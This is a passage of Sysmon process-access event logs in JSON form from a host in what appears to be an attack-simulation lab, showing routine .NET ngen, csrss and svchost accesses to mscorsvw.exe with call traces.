C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.654","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010FAD70D00}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.654\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010FAD70D00}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.654","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010FAD70D00}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010FAD70D00}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010FAD70D00}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.732\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010E4DB0D00}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.732","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010E4DB0D00}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.732\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010E4DB0D00}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.732","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010E4DB0D00}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.732\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010E4DB0D00}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.732","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010E4DB0D00}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.794\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105B1B0D00}\r\nTargetProcessId: 2556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.794","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105B1B0D00}","TargetProcessId":"2556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.794\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105B1B0D00}\r\nTargetProcessId: 2556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.794","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105B1B0D00}","TargetProcessId":"2556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
